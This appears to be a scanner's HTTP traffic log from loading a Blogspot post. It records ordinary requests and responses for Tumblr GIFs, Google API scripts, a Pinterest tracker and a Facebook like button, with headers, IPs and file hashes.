Via: http/1.1 sc4.ycpi.bf1.yahoo.com (ApacheTrafficServer [cSsNfU]), http/1.1 sc5.ycpi.bf1.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 e7.ycpi.deb.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 e4.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 442 x 250
Size:   1005589
Md5:    7c2c59a87bd8444de4d42ea12f40b95f
Sha1:   62590893e83d1a824cc111ebf6a68002e0155b3c
Sha256: 90e0e1fe976aa222a2fedb5a72334a5b158f320ec7c16fa98028f33dddd56ab5
                                        
                                            GET /tumblr_m9dqkdkG0E1roqvf0o1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Sat, 04 Aug 2018 20:27:38 GMT
Content-Length: 859770
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
Etag: "7d35b63af4fa4a2661c3984b91d59ab0-1488067200-42e44d9"
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Age: 530445
Via: http/1.1 sc20.ycpi.dcc.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 sc18.ycpi.dcc.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 e3.ycpi.deb.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 e24.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 500 x 278
Size:   859770
Md5:    7d35b63af4fa4a2661c3984b91d59ab0
Sha1:   2b00358f6d55aeac24f9a8f6aa364f4078c35033
Sha256: 28793af1fea3dbd6b4ac9a65df72e50a64ef648a3fa52f0ab611f0178dd86338
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 10 Aug 2018 23:48:26 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    a13f3edcae5a7ca01ac8bc8de008ee6d
Sha1:   1b99d5e296172df4580208ea52c6378beb0f5dd1
Sha256: dc78b462e5afa893e2411ce4cbe242dacbd37b04f9e0e09341f674ce4a211360
                                        
                                            GET /tumblr_m5i4j7vYKM1ry86iwo1_r1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 09 Aug 2018 04:30:45 GMT
Content-Length: 1015456
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
x-frames: 25
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Via: http/1.1 sc20.ycpi.bf1.yahoo.com (ApacheTrafficServer [cSsSf ]), http/1.1 sc7.ycpi.bf1.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 e16.ycpi.deb.yahoo.com (ApacheTrafficServer [cRs f ]), http/1.1 e23.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Etag: "c7ca577185b903b45aa8f58aee6254d9-1488067200-42e44d9"
Age: 155858
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 500 x 200
Size:   1015456
Md5:    c7ca577185b903b45aa8f58aee6254d9
Sha1:   ba703b52a5bdb56be28bbd6d43e5958ddb36e478
Sha256: 6471dd3dd79ebb7193cc5364bb60c3e298b72d5041ad54a2f25014b7607feb47
                                        
                                            GET /?guid=CNVgexqV65Ld&tv=2018050702&type=pidget&sub=www&button_count=2&follow_count=0&pin_count=0&profile_count=0&board_count=0&section_count=0&lang=en&via=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&callback=PIN_1533944902569.f.callback[2] HTTP/1.1 
Host: log.pinterest.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         151.101.64.84
HTTP/1.1 200 OK
                                        
Server: envoy
Set-Cookie: _pinterest_cm=TWc9PSZ0WXdOMHZJUTI3QmFKV1RVOG9qRWdBREs3U21URXNxbGZmR0dzbzZUMG9xWVhRSlh3WUNnSjcrTTJQRlRUdTBWYVg0V3l2WnhqMUZKM0F4dnVZYzFkNUZNZzZKaEtNV0VvMnRJYU0yMnRSNWJIN2gzb1ZkMUVoS3M0d012enNxSiZtdE9mUnh5NVhYRmhYOEZaMG1hYzhQVkxHZEk9; Expires=Sat, 10 Aug 2019 23:48:25 GMT; Domain=.pinterest.com
x-envoy-upstream-service-time: 2
x-pinterest-host: widgets.pinterest.com
x-pinterest-rid: 886948621037
Content-Length: 0
Accept-Ranges: bytes
Date: Fri, 10 Aug 2018 23:48:26 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-bma1628-BMA
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1533944906.907672,VS0,VE109


--- Additional Info ---
                                        
                                            GET /js/rpc:shindig_random.js?onload=init HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Fefrumuseti.blogspot.com&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
x-ua-compatible: IE=edge, chrome=1
Timing-Allow-Origin: *
Etag: "123e7ab5a742310b8ac99e073d75efd7"
Expires: Fri, 10 Aug 2018 23:48:25 GMT
Date: Fri, 10 Aug 2018 23:48:25 GMT
Cache-Control: private, max-age=1800, stale-while-revalidate=1800
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   4672
Md5:    684e73dc54e4913b3294e5d187635890
Sha1:   7b0ec966215893bbd691402eab80b6518f05d4a7
Sha256: f3e21b0892460016d97e4cfa4fcd2bf332aa034326a0c3d6316eda95b007864d
                                        
                                            GET /tumblr_m9itnkr1zM1qmsxbpo1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Mon, 06 Aug 2018 20:32:12 GMT
Content-Length: 990321
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
Etag: "4a9f2eb07dffcd594809d7cfe67a8b37-1488067200-42e44d9"
x-frames: 21
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Age: 357371
Via: http/1.1 sc8.ycpi.dcc.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 sc19.ycpi.dcc.yahoo.com (ApacheTrafficServer [cSsSf ]), http/1.1 e20.ycpi.deb.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 e3.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 500 x 252
Size:   990321
Md5:    4a9f2eb07dffcd594809d7cfe67a8b37
Sha1:   353aa7a7d7a3d82b4ec9d1aa451cf63ea00367f8
Sha256: f1e6f951af12d238c0194831fbf8e9bdd0cf1e85e7766e302789140e90778e4e
                                        
                                            GET /-6p_AqXL70hQ/UQWPHMObw9I/AAAAAAAABZ0/f2UWIvjFkSQ/s1600/footerli.png HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "v59d"
Expires: Wed, 08 Aug 2018 16:46:45 GMT
Content-Disposition: inline;filename="footerli.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 23:36:35 GMT
Server: fife
Content-Length: 223
X-XSS-Protection: 1; mode=block
Age: 711
Cache-Control: public, max-age=86400, no-transform


--- Additional Info ---
Magic:  PNG image, 4 x 7, 8-bit/color RGBA, non-interlaced
Size:   223
Md5:    04b7dfa97e05f4622e2d9a08719a7b07
Sha1:   a15042ab03db6f3d5e822ec3de37dde74c96f920
Sha256: 3e5a716afd9759cd1759126af6e50af605f0e135fedfed0a3c39ceba7c653ffc
                                        
                                            GET /accounts/o/25936583-postmessagerelay.js HTTP/1.1 
Host: ssl.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Fefrumuseti.blogspot.com&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__

                                         
                                         216.58.211.3
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3874
Date: Tue, 31 Jul 2018 23:50:00 GMT
Expires: Wed, 31 Jul 2019 23:50:00 GMT
Last-Modified: Thu, 26 Jul 2018 18:33:20 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 863906
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   3874
Md5:    1da1fdc79bdf7ac425840eb38b97e6eb
Sha1:   6f1c9d1127bdcd13258fd37c05a002e964d14e86
Sha256: cdcf8796539c10b14e76c5bbc7765b0e27552ab8c5f2163804876bd93acf2114
                                        
                                            GET /tumblr_m8hm9hTOYt1qd2dcwo1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Sat, 04 Aug 2018 06:09:47 GMT
Content-Length: 1046623
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
Etag: "f08c63717337ff355f482451a1d59835-1488067200-42e44d9"
x-frames: 17
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Age: 581917
Via: http/1.1 sc8.ycpi.dcc.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 sc19.ycpi.dcc.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 e18.ycpi.deb.yahoo.com (ApacheTrafficServer [cRs f ]), http/1.1 e13.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 500 x 275
Size:   1046623
Md5:    f08c63717337ff355f482451a1d59835
Sha1:   d8ea0ce82ad496bd5cd18cc2abcec7a69a490e21
Sha256: 8be1f4eecf797eeb12278de65df5dc0a7105ab1510c89090c5de78f619330c0e
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.en_US.A0tZbbhuWGM.O/m=rpc,shindig_random/rt=j/sv=1/d=1/ed=1/am=wQ/rs=AGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ/cb=gapi.loaded_0 HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Fefrumuseti.blogspot.com&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 16457
Date: Thu, 09 Aug 2018 17:52:52 GMT
Expires: Fri, 09 Aug 2019 17:52:52 GMT
Last-Modified: Wed, 08 Aug 2018 21:38:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 107735
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   16457
Md5:    d463240054620115bc9f2d468fa00bc4
Sha1:   1934143cdc503df9d85443ab8f5676cbb658b1de
Sha256: fa9160b8405e7d6a9b09e543f53e1f89abe05817c70e9e21181020e18eb08721
                                        
                                            GET /plugins/like.php?app_id=&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2FQX17B8fU-Vm.js%3Fversion%3D42%23cb%3Dfff0e10f052b8%26domain%3Defrumuseti.blogspot.com%26origin%3Dhttp%253A%252F%252Fefrumuseti.blogspot.com%252Ff3b2da5e0c79ee%26relation%3Dparent.parent&color_scheme=light&container_width=0&href=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&layout=button_count&locale=en_US&sdk=joey&send=true&show_faces=false HTTP/1.1 
Host: www.facebook.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         31.13.72.38
HTTP/1.1 200 OK
Content-Type: text/html; charset="utf-8"
                                        
Timing-Allow-Origin: *
X-XSS-Protection: 0
Pragma: no-cache
content-security-policy: default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';
Cache-Control: private, no-cache, no-store, must-revalidate
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
X-FB-Debug: psE7USKzB7UOXgD0G3HWN7hWSTrEWM+D2x0CK8roK2uKm9Lp+hBBVqXQn/mUvI+jg4XRWZDReFreoMhTPbXhgw==
Date: Fri, 10 Aug 2018 23:48:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   16378
Md5:    e7e203414d4679cf13b08ffaaf903194
Sha1:   c26810bc9488e99c091f3cb3e8519ada6dfb7e80
Sha256: 6a40276a817ed56e56b6749fd457aa004e9e62b701544886f27499e2927205b0
                                        
                                            GET /rsrc.php/v3/yn/r/lH1ibRl5GKq.png HTTP/1.1 
Host: static.xx.fbcdn.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/plugins/like.php?app_id=&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2FQX17B8fU-Vm.js%3Fversion%3D42%23cb%3Dfff0e10f052b8%26domain%3Defrumuseti.blogspot.com%26origin%3Dhttp%253A%252F%252Fefrumuseti.blogspot.com%252Ff3b2da5e0c79ee%26relation%3Dparent.parent&color_scheme=light&container_width=0&href=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&layout=button_count&locale=en_US&sdk=joey&send=true&show_faces=false

                                         
                                         31.13.72.12
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Allow-Credentials: true
Cache-Control: public,max-age=31536000,immutable
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
content-security-policy: default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;
Timing-Allow-Origin: *
Expires: Wed, 31 Jul 2019 23:01:47 GMT
Content-MD5: LsIm49y5qOd6jowRdAWHyQ==
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Access-Control-Allow-Origin: *
X-FB-Debug: xR3mqR6/JD5ufiuGJt4VguKyFZooNBSdoltkNjfuBlGJaphA54sFp8WYzqHccrWG+0GMIOJiECcZ7vAzAJadGg==
Date: Fri, 10 Aug 2018 23:48:27 GMT
Connection: keep-alive
Content-Length: 222


--- Additional Info ---
Magic:  PNG image, 16 x 16, 4-bit colormap, non-interlaced
Size:   222
Md5:    2ec226e3dcb9a8e77a8e8c11740587c9
Sha1:   3eeef1fffe964e01ca04216633d515b782671437
Sha256: 4c66cf58bddf9101dd5e3d83235728a64c8e7ef7032c4bcbbcc91b8aa7dcac18
                                        
                                            GET /rsrc.php/v3iEpO4/y6/l/en_US/osMNsGSOKxU.js HTTP/1.1 
Host: static.xx.fbcdn.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/plugins/like.php?app_id=&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2FQX17B8fU-Vm.js%3Fversion%3D42%23cb%3Dfff0e10f052b8%26domain%3Defrumuseti.blogspot.com%26origin%3Dhttp%253A%252F%252Fefrumuseti.blogspot.com%252Ff3b2da5e0c79ee%26relation%3Dparent.parent&color_scheme=light&container_width=0&href=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&layout=button_count&locale=en_US&sdk=joey&send=true&show_faces=false
Origin: https://www.facebook.com

                                         
                                         31.13.72.12
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
                                        
Timing-Allow-Origin: *
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Access-Control-Allow-Credentials: true
Cache-Control: public,max-age=31536000,immutable
Expires: Sat, 10 Aug 2019 19:08:15 GMT
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Encoding: gzip
Content-MD5: a7f3v+QgY+SwqxCSGYSbPw==
X-FB-Debug: MUq7K+udljGsUtJHsLBo9CdBa6I1tKSBLlhAOTMue4VBjpIR30VtG9dv7afud9Yrto9THJpScQgN/gHVV1Zmmg==
Date: Fri, 10 Aug 2018 23:48:27 GMT
Connection: keep-alive
Content-Length: 140909


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   140909
Md5:    6bb7f7bfe42063e4b0ab109219849b3f
Sha1:   82abe009930fed2fd6901f4d2e07f601b05f3685
Sha256: dfd9205f888823833f9c5d92cf2dd62b47c6a65d67ee5a2ef867712dfeee1d92